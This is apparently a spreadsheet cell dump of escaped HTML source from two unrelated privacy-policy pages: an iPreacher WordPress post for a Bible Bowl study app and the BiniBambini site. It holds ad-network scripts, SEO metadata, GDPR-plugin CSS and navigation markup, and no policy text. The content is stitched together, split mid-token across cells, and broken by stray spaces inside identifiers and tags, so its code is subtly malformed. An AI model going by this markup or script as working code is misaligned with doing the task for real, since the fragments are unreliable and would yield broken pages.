&lt;!-- Jetpack Open Graph Tags --&gt;
&lt;meta property="og:type" content="article" /&gt;
&lt;meta property="og:title" content="Bible Bowl Prep for 2023 L2L Privacy Policy" /&gt;
&lt;meta property="og:url" content="https://ipreacher.wordpress.com/2022/10/17/bible-bowl-prep-for-2023-l2l-privacy-policy/" /&gt;
&lt;meta property="og:description" content="This is for the app &amp;#8216;Bible Bowl Prep for 2023 L2L&amp;#8217;. We do not store, use, or send your private personal information."</t>
  </si>
  <si>
    <t>/&gt;
&lt;meta property="article:published_time" content="2022-10-17T21:35:20+00:00" /&gt;
&lt;meta property="article:modified_time" content="2022-10-17T21:35:20+00:00" /&gt;
&lt;meta property="og:site_name" content="iPreacher" /&gt;
&lt;meta property="og:image" content="https://s0.wp.com/i/blank.jpg" /&gt;
&lt;meta property="og:image:alt" content="" /&gt;
&lt;meta property="og:locale" content="en_US" /&gt;
&lt;meta property="fb:app_id" content="249643311490" /&gt;
&lt;meta property="article:publisher" content="https://www.facebook.com/WordPresscom" /&gt;
&lt;meta name="twitter:creator" content="@TBrass84" /&gt;
&lt;meta name="twitter:site" content="@TBrass84" /&gt;
&lt;meta name="twitter:text:title" content="Bible Bowl Prep for 2023 L2L Privacy&amp;nbsp;Policy" /&gt;
&lt;meta name="twitter:card" content="summary" /&gt;
&lt;!-- End Jetpack Open Graph Tags --&gt;
&lt;link rel="shortcut icon" type="image/x-icon" href="https://s1.wp.com/i/favicon.ico" sizes="16x16 24x24 32x32 48x48" /&gt;
&lt;link rel="icon" type="image/x-icon" href="https://s1.wp.com/i/favicon.ico" sizes="16x16 24x24 32x32 48x48" /&gt;
&lt;link rel="apple-touch-icon" href="https://s2.wp.com/i/webclip.png" /&gt;
&lt;link rel='openid.server' href='https://ipreacher.wordpress.com/?openidserver=1' /&gt;
&lt;link rel='openid.delegate' href='https://ipreacher.wordpress.com/' /&gt;
&lt;link rel="search" type="application/opensearchdescription+xml" href="https://ipreacher.wordpress.com/osd.xml" title="iPreacher" /&gt;
&lt;link rel="search" type="application/opensearchdescription+xml" href="https://s1.wp.com/opensearch.xml" title="WordPress.com" /&gt;
		&lt;style type="text/css"&gt;
			.recentcomments a {
				display: inline !important;
				padding: 0 !important;
				margin: 0 !important;
			}
			table.recentcommentsavatartop img.avatar, table.recentcommentsavatarend img.avatar {
				border: 0px;
				margin: 0;
			}
			table.recentcommentsavatartop a, table.recentcommentsavatarend a {
				border: 0px !important;
				background-color: transparent !important;
			}
			td.recentcommentsavatarend, td.recentcommentsavatartop {
				padding: 0px 0px 1px 0px;
				margin: 0px;
			}
			td.recentcommentstextend {
				border: none !important;
				padding:</t>
  </si>
  <si>
    <t>0px 0px 2px 10px;
			}
			.rtl td.recentcommentstextend {
				padding: 0px 10px 2px 0px;
			}
			td.recentcommentstexttop {
				border: none;
				padding: 0px 0px 0px 10px;
			}
			.rtl td.recentcommentstexttop {
				padding: 0px 10px 0px 0px;
			}
		&lt;/style&gt;
		&lt;meta name="application-name" content="iPreacher" /&gt;&lt;meta</t>
  </si>
  <si>
    <t>name="msapplication-window" content="width=device-width;height=device-height" /&gt;&lt;meta name="msapplication-tooltip" content="Ministry, Technology, and Times They Combine" /&gt;&lt;meta name="msapplication-task" content="name=Subscribe;action-uri=https://ipreacher.wordpress.com/feed/;icon-uri=https://s1.wp.com/i/favicon.ico" /&gt;&lt;meta</t>
  </si>
  <si>
    <t>name="msapplication-task" content="name=Sign up for a free blog;action-uri=http://wordpress.com/signup/;icon-uri=https://s1.wp.com/i/favicon.ico" /&gt;&lt;meta name="msapplication-task" content="name=WordPress.com Support;action-uri=http://support.wordpress.com/;icon-uri=https://s1.wp.com/i/favicon.ico" /&gt;&lt;meta name="msapplication-task" content="name=WordPress.com Forums;action-uri=http://forums.wordpress.com/;icon-uri=https://s1.wp.com/i/favicon.ico" /&gt;&lt;meta</t>
  </si>
  <si>
    <t>name="description" content="This is for the app &amp;#039;Bible Bowl Prep for 2023 L2L&amp;#039;. We do not store, use, or send your private personal information." /&gt;
		&lt;script type='application/javascript' src='https://ced.sascdn.com/tag/3905/smart.js' async&gt;&lt;/script&gt;
		&lt;script type='application/javascript'&gt;
			var sas = sas || {};
			var sas_fallback = sas_fallback ||</t>
  </si>
  <si>
    <t>[];
			sas.cmd = sas.cmd || [];
			sas.cmd.push(function() {
				sas.setup({networkid: 3905, domain: 'https://www15.smartadserver.com', async: true});
			});
			sas.cmd.push(function() {
				sas.call('onecall', {
					siteId: 474853,
					pageId: 1572546,
					formats: [
						{ id: 110354, tagId: "sas_110354" }
					],
					target: 'iab_category=IAB23;iab_category=IAB14;wp_blog_id=13844599',
				});
			});
			sas.cmd.push(function() {
				sas.events.on('noad', function(data) {
					var el = document.getElementById(data.tagId);
					var wrapper = el.closest('.wordads-ad-wrapper');
					if ( sas_fallback.length === 0 ) {
						wrapper.remove();
						return;
					}
					// Process first tag.
					 var tag = sas_fallback[0].tag;
					//</t>
  </si>
  <si>
    <t xml:space="preserve">Unescape the tag markup.
					 var e = document.createElement('div');
					 e.innerHTML = tag;
					tag = e.childNodes[0].nodeValue;
					// Insert the tag.
					</t>
  </si>
  <si>
    <t>wrapper.innerHTML = tag;
					// Process any scripts in the tag.
					 var scripts = wrapper.querySelectorAll('script');
					scripts.forEach( function (script) {
						script.parentNode.removeChild(script);
						var scriptTag = document.createElement('script');
						if (script.src) {
							scriptTag.src = script.src;
						} else if (script.textContent) {
							scriptTag.textContent = script.textContent;
						} else if (script.innerText) {
							scriptTag.innerText = script.innerText;
						}
						document.body.appendChild(scriptTag);
					});
				});
			});
			sas.cmd.push(function() {
				sas.events.on('load', function(data) {
					var el = document.getElementById(data.tagId);
					el.closest('.wordads-ad-wrapper').style.display = 'inherit';
				});
			});
		&lt;/script&gt;		&lt;script&gt;
			window.sas_fallback = window.sas_fallback || [];
			window.sas_fallback.push( { tag: "&amp;lt;div class=&amp;quot;OUTBRAIN wa-ob-widget&amp;quot;data-ob-contentUrl=&amp;quot;https://ipreacher.wordpress.com/2022/10/17/bible-bowl-prep-for-2023-l2l-privacy-policy/&amp;quot;data-widget-id=&amp;quot;AR_1&amp;quot;data-ob-installation-key=&amp;quot;WORDP263NC92GIANECJP6HEPM&amp;quot;data-ob-psub=&amp;quot;society&amp;quot;&amp;gt;&amp;lt;/div&amp;gt;&amp;lt;script&amp;gt;window._stq = window._stq ||</t>
  </si>
  <si>
    <t>[];window._stq.push( [ \'extra\', { x_wordads_outbrain: \'widget_render_ar_1\', }, ] );&amp;lt;/script&amp;gt;&amp;lt;script src=&amp;quot;https://widgets.outbrain.com/outbrain.js&amp;quot;&amp;gt;&amp;lt;/script&amp;gt;", } );
		&lt;/script&gt;		&lt;script type="text/javascript"&gt;
		function __ATA_CC() {var v = document.cookie.match('(^|;) ?personalized-ads-consent=([^;]*)(;|$)');return v ? 1 : 0;}
		var __ ATA_PP = { 'pt': 1, 'ht': 0, 'tn': 'intergalactic', 'uloggedin': 0, 'amp': false, 'consent': __ATA_CC(), 'gdpr_applies': false, 'ad': { 'label': { 'text': 'Advertisements' }, 'reportAd': { 'text': 'Report this ad' } }, 'siteid': 8982, 'blogid': 13844599 };
		var __ ATA = __</t>
  </si>
  <si>
    <t>ATA || {};
		__ ATA.cmd = __ ATA.cmd ||</t>
  </si>
  <si>
    <t>[];
		__ATA.criteo = __ATA.criteo || {};
		__ ATA.criteo.cmd = __ATA.criteo.cmd ||</t>
  </si>
  <si>
    <t>[];
		&lt;/script&gt;
		&lt;script type="text/javascript"&gt;
		(function(){var g=Date.now||function(){return+new Date};function h(a,b){a:{for(var c=a.length,d="string"==typeof a?a.split(""):a,e=0;e&lt;c;e++)if(e in d&amp;&amp;b.call(void 0,d[e],e,a)){b=e;break a}b=-1}return 0&gt;b?null:"string"==typeof a?a.charAt(b):a[b]};function k(a,b,c){c=null!=c?"="+encodeURIComponent(String(c)):"";if(b+=c){c=a.indexOf("#");0&gt;c&amp;&amp;(c=a.length);var d=a.indexOf("?");if(0&gt;d||d&gt;c){d=c;var e=""}else e=a.substring(d+1,c);a=[a.substr(0,d),e,a.substr(c)];c=a[1];a[1]=b?c?c+"&amp;"+b:b:c;a=a[0]+(a[1]?"?"+a[1]:"")+a[2]}return a};var l=0;function m(a,b){var c=document.createElement("script");c.src=a;c.onload=function(){b&amp;&amp;b(void 0)};c.onerror=function(){b&amp;&amp;b("error")};a=document.getElementsByTagName("head");var d;a&amp;&amp;0!==a.length?d=a[0]:d=document.documentElement;d.appendChild(c)}function n(a){var b=void 0===b?document.cookie:b;return(b=h(b.split("; "),function(c){return-1!=c.indexOf(a+"=")}))?b.split("=")[1]:""}function p(a){return"string"==typeof a&amp;&amp;0&lt;a.length}
		function r(a,b,c){b=void 0===b?"":b;c=void 0===c?". ":c;var d=[];Object.keys(a).forEach(function(e){var f</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;_x005F_x000D_
&lt;html lang="en-US"&gt;_x005F_x000D_
&lt;head&gt;_x005F_x000D_
    &lt;meta charset="UTF-8"&gt;_x005F_x000D_
    &lt;meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0" name="viewport"&gt;_x005F_x000D_
    &lt;link href="favicon.ico" rel="shortcut icon" type="image/x-icon"&gt;_x005F_x000D_
    &lt;link rel="alternate" hreflang="en" href="https://binibambini.com/privacy-policy/" /&gt;
	&lt;!-- This site is optimized with the Yoast SEO plugin v15.0 - https://yoast.com/wordpress/plugins/seo/ --&gt;
	&lt;title&gt;Privacy Policy - BiniBambini&lt;/title&gt;
	&lt;meta name="robots" content="index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1" /&gt;
	&lt;link rel="canonical" href="https://binibambini.com/privacy-policy/" /&gt;
	&lt;meta property="og:locale" content="en_US" /&gt;
	&lt;meta property="og:type" content="article" /&gt;
	&lt;meta property="og:title" content="Privacy Policy - BiniBambini" /&gt;
	&lt;meta property="og:url" content="https://binibambini.com/privacy-policy/" /&gt;
	&lt;meta property="og:site_name" content="BiniBambini" /&gt;
	&lt;meta property="article:publisher" content="https://www.facebook.com/binibambinipage/" /&gt;
	&lt;meta property="article:modified_time" content="2022-10-04T09:29:47+00:00" /&gt;
	&lt;meta name="twitter:card" content="summary_large_image" /&gt;
	&lt;script type="application/ld+json" class="yoast-schema-graph"&gt;{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"https://binibambini.com/#organization","name":"Bini Bambini","url":"https://binibambini.com/","sameAs":["https://www.facebook.com/binibambinipage/","https://www.instagram.com/bini.bambini/","https://www.youtube.com/channel/UCzNqervZjsZCgNaWLMwlOSA","https://www.pinterest.com/BiniBambini_/"],"logo":{"@type":"ImageObject","@id":"https://binibambini.com/#logo","inLanguage":"en-US","url":"https://binibambini.com/wp-content/uploads/2021/06/Bini-logo.png","width":454,"height":151,"caption":"Bini Bambini"},"image":{"@id":"https://binibambini.com/#logo"}},{"@type":"WebSite","@id":"https://binibambini.com/#website","url":"https://binibambini.com/","name":"BiniBambini","description":"Just another WordPress site","publisher":{"@id":"https://binibambini.com/#organization"},"potentialAction":[{"@type":"SearchAction","target":"https://binibambini.com/?s={search_term_string}","query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https://binibambini.com/privacy-policy/#webpage","url":"https://binibambini.com/privacy-policy/","name":"Privacy Policy - BiniBambini","isPartOf":{"@id":"https://binibambini.com/#website"},"datePublished":"2020-07-09T09:41:36+00:00","dateModified":"2022-10-04T09:29:47+00:00","inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https://binibambini.com/privacy-policy/"]}]}]}&lt;/script&gt;
	&lt;!-- / Yoast SEO plugin. --&gt;
&lt;link rel='dns-prefetch' href='//s.w.org' /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="BiniBambini &amp;raquo; Privacy Policy Comments Feed" href="https://binibambini.com/privacy-policy/feed/" /&gt;
		&lt;script type="text/javascript"&gt;
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/binibambini.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.5.11"}};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[55357,56424,8205,55356,57212],[55357,56424,8203,55356,57212])}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</si>
  <si>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 important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
&lt;/style&gt;
	&lt;link rel='stylesheet' id='fbrev_css-css'  href='https://binibambini.com/wp-content/plugins/fb-reviews-widget/static/css/facebook-review.css?ver=1.7.1' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='sb_instagram_styles-css'  href='https://binibambini.com/wp-content/plugins/instagram-feed/css/sb-instagram-2-2.min.css?ver=2.4.6' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='wp-block-library-css'  href='https://binibambini.com/wp-includes/css/dist/block-library/style.min.css?ver=5.5.11' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='contact-form-7-css'  href='https://binibambini.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.3.2' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='flexboxgrid-css'  href='https://binibambini.com/wp-content/themes/binibambini/assets/libs/flexboxgrid/dist/flexboxgrid.min.css?ver=5.5.11' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='fancybox-css'  href='https://binibambini.com/wp-content/themes/binibambini/assets/libs/fancybox/dist/jquery.fancybox.min.css?ver=5.5.11' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='select2-css'  href='https://binibambini.com/wp-content/themes/binibambini/assets/libs/select2/dist/css/select2.min.css?ver=5.5.11' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='raty-css'  href='https://binibambini.com/wp-content/themes/binibambini/assets/libs/raty-js/lib/jquery.raty.css?ver=5.5.11' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='swiper-css'  href='https://binibambini.com/wp-content/themes/binibambini/assets/libs/swiper/dist/css/swiper.min.css?ver=5.5.11' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='main-style-css'  href='https://binibambini.com/wp-content/themes/binibambini/assets/css/main.css?ver=22:55:49' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='dev-style-temporary-css'  href='https://binibambini.com/wp-content/themes/binibambini/assets/css/dev-temp.css?ver=22:55:49' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='app-css'  href='https://binibambini.com/wp-content/themes/binibambini/assets/css/app.a7b44abb.css?ver=22:55:49' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='moove_gdpr_frontend-css'  href='https://binibambini.com/wp-content/plugins/gdpr-cookie-compliance/dist/styles/gdpr-main.css?ver=4.5.8' type='text/css' media='all' /&gt;
&lt;style id='moove_gdpr_frontend-inline-css' type='text/css'&gt;
#moove_gdpr_cookie_modal,#moove_gdpr_cookie_info_bar,.gdpr_cookie_settings_shortcode_content{font-family:Nunito,sans-serif}#moove_gdpr_save_popup_settings_button{background-color:#373737;color:#fff}#moove_gdpr_save_popup_settings_button:hover{background-color:#000}#moove_gdpr_cookie_info_bar .moove-gdpr-info-bar-container .moove-gdpr-info-bar-content a.mgbutton,#moove_gdpr_cookie_info_bar .moove-gdpr-info-bar-container .moove-gdpr-info-bar-content button.mgbutton{background-color:#ff008c}#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-footer-content .moove-gdpr-button-holder a.mgbutton,#moove_gdpr_cookie_modal .moove -gdpr-modal-content .moove-gdpr-modal-footer-content .moove-gdpr-button-holder button.mgbutton,.gdpr_cookie_settings_shortcode_content .gdpr-shr-button.button-green{background-color:#ff008c;border-color:#ff008c}#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-footer-content .moove-gdpr-button-holder a.mgbutton:hover,#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-footer-content .moove-gdpr-button-holder button.mgbutton:hover,.gdpr_cookie_settings_shortcode_content .gdpr-shr-button.button-green:hover{background-color:#fff;color:#ff008c}#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-close i,#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-close span.gdpr-icon{background-color:#ff008c;border:1px solid #ff008c}#moove_gdpr_cookie_info_bar span.change-settings-button.focus-g{-webkit-box-shadow:0 0 1px 3px</t>
  </si>
  <si>
    <t>#ff008c;-moz-box-shadow:0 0 1px 3px #ff008c;box-shadow:0 0 1px 3px #ff008c}#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-close i:hover,#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-close span.gdpr-icon:hover,#moove_gdpr_cookie_info_bar span[data-href]&gt;u.change-settings-button{color:#ff008c}#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-left-content #moove-gdpr-menu li.menu-item-selected a span.gdpr-icon,#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-left-content #moove-gdpr-menu li.menu-item-selected button span.gdpr-icon{color:inherit}#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-left-content #moove-gdpr-menu li:hover a,#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-left-content #moove-gdpr-menu li:hover button{color:#000}#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-left-content #moove-gdpr-menu li a span.gdpr-icon,#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-left-content #moove-gdpr-menu li button span.gdpr-icon{color:inherit}#moove_gdpr_cookie_modal .gdpr-acc-link{line-height:0;font-size:0;color:transparent;position:absolute}#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-close:hover i,#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-left-content #moove-gdpr-menu li a,#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-left-content</t>
  </si>
  <si>
    <t>#moove-gdpr-menu li button,#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-left-content #moove-gdpr-menu li button i,#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-left-content #moove-gdpr-menu li a i,#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-tab-main .moove-gdpr-tab-main-content a:hover,#moove_gdpr_cookie_info_bar.moove-gdpr-dark-scheme .moove-gdpr-info-bar-container .moove-gdpr-info-bar-content a.mgbutton:hover,#moove_gdpr_cookie_info_bar.moove-gdpr-dark-scheme .moove-gdpr-info-bar-container .moove-gdpr-info-bar-content button.mgbutton:hover,#moove_gdpr_cookie_info_bar.moove-gdpr-dark-scheme .moove-gdpr-info-bar-container .moove-gdpr-info-bar-content a:hover,#moove_gdpr_cookie_info_bar.moove-gdpr-dark-scheme .moove-gdpr-info-bar-container .moove-gdpr-info-bar-content button:hover,#moove_gdpr_cookie_info_bar.moove-gdpr-dark-scheme .moove-gdpr-info-bar-container .moove-gdpr-info-bar-content span.change-settings-button:hover,#moove_gdpr_cookie_info_bar.moove-gdpr-dark-scheme .moove-gdpr-info-bar-container .moove-gdpr-info-bar-content u.change-settings-button:hover,#moove_gdpr_cookie_info_bar span[data-href]&gt;u.change-settings-button,#moove_gdpr_cookie_info_bar.moove-gdpr-dark-scheme .moove-gdpr-info-bar-container .moove-gdpr-info-bar-content a.mgbutton.focus-g,#moove_gdpr_cookie_info_bar.moove-gdpr-dark-scheme .moove-gdpr-info-bar-container .moove-gdpr-info-bar-content button.mgbutton.focus-g,#moove_gdpr_cookie_info_bar.moove-gdpr-dark-scheme .moove-gdpr-info-bar-container .moove-gdpr-info-bar-content a.focus-g,#moove_gdpr_cookie_info_bar.moove-gdpr-dark-scheme .moove-gdpr-info-bar-container .moove-gdpr-info-bar-content button.focus-g,#moove_gdpr_cookie_info_bar.moove-gdpr-dark-scheme .moove-gdpr-info-bar-container .moove-gdpr-info-bar-content span.change-settings-button.focus-g,#moove_gdpr_cookie_info_bar.moove-gdpr-dark-scheme .moove-gdpr-info-bar-container .moove-gdpr-info-bar-content u.change-settings-button.focus-g{color:#ff008c}#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-left-content #moove-gdpr-menu li.menu-item-selected a,#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-left-content #moove-gdpr-menu li.menu-item-selected button{color:#000}#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-left-content #moove-gdpr-menu li.menu-item-selected a i,#moove_gdpr_cookie_modal .moove-gdpr-modal-content .moove-gdpr-modal-left-content #moove-gdpr-menu li.menu-item-selected button i{color:#000}#moove_gdpr_cookie_modal.gdpr_lightbox-hide{display:none}
&lt;/style&gt;
&lt;script type='text/javascript' src='https://binibambini.com/wp-content/plugins/fb-reviews-widget/static/js/wpac-time.js?ver=1.7.1' id='wpac_time_js-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='https://binibambini.com/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp' id='jquery-core-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='https://binibambini.com/wp-content/plugins/sitepress-multilingual-cms/res/js/jquery.cookie.js?ver=4.4.3' id='jquery.cookie-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' id='wpml-cookie-js-extra'&gt;
/* &lt;! [CDATA[ */
var wpml_cookies = {"wp-wpml_current_language":{"value":"en","expires":1,"path":"\/"}};
var wpml_cookies = {"wp-wpml_current_language":{"value":"en","expires":1,"path":"\/"}};
/* ]]&gt; */
&lt;/script&gt;
&lt;script type='text/javascript' src='https://binibambini.com/wp-content/plugins/sitepress-multilingual-cms/res/js/cookies/language-cookie.js?ver=4.4.3' id='wpml-cookie-js'&gt;&lt;/script&gt;
&lt;link rel="https://api.w.org/" href="https://binibambini.com/wp-json/" /&gt;&lt;link rel="alternate" type="application/json" href="https://binibambini.com/wp-json/wp/v2/pages/3" /&gt;&lt;link</t>
  </si>
  <si>
    <t>rel="EditURI" type="application/rsd+xml" title="RSD" href="https://binibambini.com/xmlrpc.php?rsd" /&gt;
&lt;link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://binibambini.com/wp-includes/wlwmanifest.xml" /&gt; 
&lt;meta name="generator" content="WordPress 5.5.11" /&gt;
&lt;link rel='shortlink' href='https://binibambini.com/?p=3' /&gt;
&lt;link rel="alternate" type="application/json+oembed" href="https://binibambini.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fbinibambini.com%2Fprivacy-policy%2F" /&gt;
&lt;link rel="alternate" type="text/xml+oembed" href="https://binibambini.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fbinibambini.com%2Fprivacy-policy%2F&amp;#038;format=xml" /&gt;
&lt;meta name="generator" content="WPML ver:4.4.3 stt:1,45,54;" /&gt;
    &lt;style type="text/css"&gt;
        .header {
            background: #ffffff;
        }
    &lt;/style&gt;
    &lt;meta name="generator" content="Powered by WPBakery Page Builder - drag and drop page builder for WordPress. "/&gt;
&lt;link rel="icon" href="https://binibambini.com/wp-content/uploads/2020/11/favicon-1.ico" sizes="32x32" /&gt;
&lt;link rel="icon" href="https://binibambini.com/wp-content/uploads/2020/11/favicon-1.ico" sizes="192x192" /&gt;
&lt;link rel="apple-touch-icon" href="https://binibambini.com/wp-content/uploads/2020/11/favicon-1.ico" /&gt;
&lt;meta name="msapplication-TileImage" content="https://binibambini.com/wp-content/uploads/2020/11/favicon-1.ico" /&gt;
&lt;style type="text/css" data-type="vc_shortcodes-custom-css"&gt;.vc_custom_1613654968800{margin-top: 25px !important;}&lt;/style&gt;&lt;noscript&gt;&lt;style&gt; .wpb_animate_when_almost_visible { opacity: 1; }&lt;/style&gt;&lt;/noscript&gt;_x005F_x000D_
    &lt;!--[if</t>
  </si>
  <si>
    <t>IE]&gt;_x005F_x000D_
    &lt;meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"/&gt;_x005F_x000D_
    &lt;! [endif]--&gt;_x005F_x000D_
    &lt;meta name="description" content=""&gt;_x005F_x000D_
    &lt;meta name="keywords" content=""&gt;_x005F_x000D_
&lt;!--    &lt;link rel="stylesheet" href="css/main.css"&gt;--&gt;_x005F_x000D_
&lt;/head&gt;_x005F_x000D_
&lt;body class="privacy-policy page-template page-template-main_pb page-template-main_pb-php page page-id-3 wp-custom-logo wp-embed-responsive wpb-js-composer js-comp-ver-6.3.0 vc_responsive"&gt;_x005F_x000D_
&lt;noscript&gt;_x005F_x000D_
    &lt;div class="off-js"&gt;_x005F_x000D_
        &lt;strong&gt; Для полной функциональности этого сайта необходимо включить JavaScript.&lt;/strong&gt;_x005F_x000D_
        Вот &lt;a href="https://artjoker.ua/ru/blog/how-to-enable-javascript/" target="_blank"&gt;инструкции&lt;/a&gt;, как включить JavaScript в вашем браузере._x005F_x000D_
    &lt;/div&gt;_x005F_x000D_
&lt;/noscript&gt;_x005F_x000D_
&lt;!--[if</t>
  </si>
  <si>
    <t xml:space="preserve">lt IE 11]&gt;_x005F_x000D_
&lt;p class="oldBrowser"&gt;Ваш браузер устарел, пожалуйста &lt;b&gt;обновите&lt;/b&gt; его.&lt;/p&gt;_x005F_x000D_
&lt;! [endif]--&gt;_x005F_x000D_
&lt;div class="page-wrapper"&gt;_x005F_x000D_
    &lt;span class="go-to-top"&gt;_x005F_x000D_
         &lt;i class="icon icon-arr-r-bold1"&gt;&lt;/i&gt;_x005F_x000D_
    &lt;/span&gt;_x005F_x000D_
    </t>
  </si>
  <si>
    <t>&lt; header class="header"&gt;_x005F_x000D_
        &lt;div class="container flex-wrap"&gt;_x005F_x000D_
                &lt;div class="header__left flex-wrap middle-xs"&gt;_x005F_x000D_
                    &lt;div class="mob-btn"&gt;_x005F_x000D_
                        &lt;button class="button-reset menu-trigger js_open-main-menu"&gt;_x005F_x000D_
                            &lt;div&gt;&lt;/div&gt;&lt;div&gt;&lt;/div&gt;&lt;div&gt;&lt;/div&gt;_x005F_x000D_
                        &lt;/button&gt;_x005F_x000D_
                        &lt;div class="menu-dropdown main-navigation-mobile"&gt;_x005F_x000D_
                            &lt;div class="menu-dropdown__header"&gt;_x005F_x000D_
                                &lt;button class="button-reset menu-trigger js_open-main-menu"&gt;_x005F_x000D_
                                    &lt;div&gt;&lt;/div&gt;&lt;div&gt;&lt;/div&gt;&lt;div&gt;&lt;/div&gt;_x005F_x000D_
                                &lt;/button&gt;_x005F_x000D_
                                &lt;div class="menu-dropdown__header-bottom flex-wrap between-xs middle-xs"&gt;_x005F_x000D_
                                    &lt;div class="page-title color--white menu-dropdown__header-title"&gt;Menu&lt;/div&gt;_x005F_x000D_
                                    &lt;div class="header__lang"&gt;_x005F_x000D_
                                        &lt;div class="js_drop dropdown"&gt;_x005F_x000D_
                                                                                        &lt;div class="btn btn--light-blue"&gt;English &lt;i class="icon icon-caret"&gt;&lt;/i&gt;&lt;/div&gt;_x005F_x000D_
                                                                                            &lt;ul class="dropdown__list js_dropdown"&gt;_x005F_x000D_
                                                                                                                                                                                                                            &lt;</t>
  </si>
  <si>
    <t>li&gt;&lt;a href="https://binibambini.com/uk/privacy-policy/" class="dropdown__item"&gt;Українська&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
                                                                                                                                                                    &lt;li&gt;&lt;a href="https://binibambini.com/ru/privacy-policy/" class="dropdown__item"&gt;Русский&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
                                                                                                    &lt;/ul&gt;_x005F_x000D_
                                                                                    &lt;/div&gt;_x005F_x000D_
                                    &lt;/div&gt;_x005F_x000D_
                                &lt;/div&gt;_x005F_x000D_
                            &lt;/div&gt;_x005F_x000D_
	                        	                        &lt;ul class="menu-dropdown__list menu"&gt;&lt;li id="menu-item-1139" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1139 nav-link"&gt;&lt;a class="menu-dropdown__item" href="https://binibambini.com/about/"&gt;About us&lt;i class="icon icon-arr-r-bold"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-1142" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1142 nav-link"&gt;&lt;a class="menu-dropdown__item" href="https://binibambini.com/catalog-page/"&gt;Our apps&lt; i class="icon icon-arr-r-bold"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-1140" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1140 nav-link"&gt;&lt;a class="menu-dropdown__item" href="https://binibambini.com/career/"&gt;Careers&lt;i class="icon icon-arr-r-bold"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-1141" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1141 nav-link"&gt;&lt;a class="menu-dropdown__item" href="https://binibambini.com/contacts/"&gt;Contacts&lt;i class="icon icon-arr-r-bold"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-3899" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-3899 nav-link"&gt;&lt;a class="menu-dropdown__item" href="/category/blog/"&gt;Blog&lt;i class="icon icon-arr-r-bold"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;	                                                &lt;/div&gt;_x005F_x000D_
                    &lt;/div&gt;_x005F_x000D_
                        &lt;!--_x005F_x000D_
                            &lt;div class="header__logo"&gt;&lt;/div&gt;_x005F_x000D_
